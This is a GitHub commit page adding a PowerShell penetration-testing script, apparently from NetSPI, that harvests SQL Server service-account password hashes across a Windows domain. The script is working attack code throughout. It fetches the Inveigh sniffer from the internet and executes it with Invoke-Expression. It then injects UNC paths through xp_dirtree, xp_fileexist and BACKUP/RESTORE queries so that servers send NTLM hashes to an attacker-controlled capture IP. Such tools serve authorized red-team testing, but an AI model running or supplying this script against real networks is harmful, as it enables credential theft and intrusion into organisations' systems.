Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

Commit 37fdfe3

Browse filesBrowse files
authored
Create Get-SQLServiceAccountPwHashes.ps1
1 parent ea58d71 commit 37fdfe3
Copy full SHA for 37fdfe3

1 file changed

+106Lines changed: 106 additions & 0 deletions

File tree

Expand file treeCollapse file tree
Open diff view settings
Filter options
Expand file treeCollapse file tree
Open diff view settings
Collapse file
+106Lines changed: 106 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,106 @@
1+
# author: scott sutherland (@_nullbind), NetSPI 2016
2+
# script name: Get-SQLServiceAccountPwHash.ps1
3+
# requirements: PowerUpSQL and Inveigh
4+
# description: locate domain sql servers, attempt login, unc path inject to capture password hash of associated service account.
5+
# example: Get-SQLServiceAccountPwHashes -Verbose -CaptureIp 10.1.1.12
6+
# Note: alt domain user: runas /noprofile /netonly /user:domain\users powershell.exe
7+
8+
Function Get-SQLServiceAccountPwHashes {
9+
10+
[CmdletBinding()]
11+
Param(
12+
[Parameter(Mandatory=$false)]
13+
[string]$Username,
14+
15+
[Parameter(Mandatory=$false)]
16+
[string]$Password,
17+
18+
[Parameter(Mandatory=$false)]
19+
[string]$DomainController,
20+
21+
[Parameter(Mandatory=$true)]
22+
[string]$CaptureIp,
23+
24+
[Parameter(Mandatory=$false)]
25+
[int]$TimeOut = 5
26+
)
27+
28+
Begin
29+
{
30+
# Attempt to load Inveigh via reflection
31+
Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1')
32+
33+
$TestIt = Test-Path -Path Function:\Invoke-Inveigh
34+
if($TestIt -eq 'True')
35+
{
36+
Write-Verbose -Message "Inveigh loaded."
37+
}else{
38+
Write-Verbose -Message "Inveigh NOT loaded."
39+
return
40+
}
41+
}
42+
43+
Process
44+
{
45+
# Discover SQL Servers on the Domain via LDAP queries for SPN records
46+
Write-Verbose "Testings access to domain sql servers..."
47+
$SQLServerInstances = Get-SQLInstanceDomain -verbose -CheckMgmt -DomainController $DomainController -Username $Username -Password $Password | Get-SQLConnectionTestThreaded -Verbose -Threads 15
48+
$SQLServerInstancesCount = $SQLServerInstances.count
49+
Write-output "$SQLServerInstancesCount SQL Server instances found"
50+
51+
# Get list of SQL Servers that the provided account can log into
52+
$AccessibleSQLServers = $SQLServerInstances | ? {$_.status -eq "Accessible"}
53+
$AccessibleSQLServersCount = $AccessibleSQLServers.count
54+
55+
# Status user
56+
Write-output "$AccessibleSQLServersCount SQL Server instances can be logged into"
57+
Write-output "Attacking $AccessibleSQLServersCount accessible SQL Server instances..."
58+
59+
# Start sniffing
60+
Invoke-Inveigh -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue | Out-Null
61+
62+
# Perform unc path injection on each one
63+
$AccessibleSQLServers |
64+
ForEach-Object{
65+
66+
# Get current instance
67+
$CurrentInstance = $_.Instance
68+
69+
# Start unc path injection for each interface
70+
Write-Output "$CurrentInstance - Injecting UNC path to \\$CaptureIp\file"
71+
72+
# Functions executable by the Public role that accept UNC paths
73+
Get-SQLQuery -Instance $CurrentInstance -Query "xp_dirtree '\\$CaptureIp\file'" -SuppressVerbose | out-null
74+
Get-SQLQuery -Instance $CurrentInstance -Query "xp_fileexist '\\$CaptureIp\file'" -SuppressVerbose | out-null
75+
Get-SQLQuery -Instance $CurrentInstance -Query "BACKUP DATABASE TESTING TO DISK = '\\$CaptureIp\file'" -SuppressVerbose | out-null
76+
Get-SQLQuery -Instance $CurrentInstance -Query "RESTORE VERIFYONLY FROM DISK = '\\$CaptureIp\file'" -SuppressVerbose | out-null
77+
78+
# Sleep to give the SQL Server time to send us hashes :)
79+
sleep $TimeOut
80+
81+
# Get hashes
82+
Write-Verbose "Captured password hashes:"
83+
Get-InveighCleartext | Sort-Object
84+
Get-InveighNTLMv1 | Sort-Object
85+
Get-InveighNTLMv2 | Sort-Object
86+
}
87+
}
88+
89+
End
90+
{
91+
# Return results
92+
Write-Output "---------------------------------------"
93+
Write-Output "Final List of Captured password hashes:"
94+
Write-Output "---------------------------------------"
95+
Get-InveighCleartext | Sort-Object
96+
Get-InveighNTLMv1 | Sort-Object
97+
Get-InveighNTLMv2 | Sort-Object
98+
99+
# Stop sniffing
100+
Stop-Inveigh | Out-Null
101+
102+
# Clear cache
103+
Clear-Inveigh | Out-Null
104+
}
105+
}
106+

0 commit comments

Comments
0 (0)
Morty Proxy This is a proxified and sanitized view of the page, visit original site.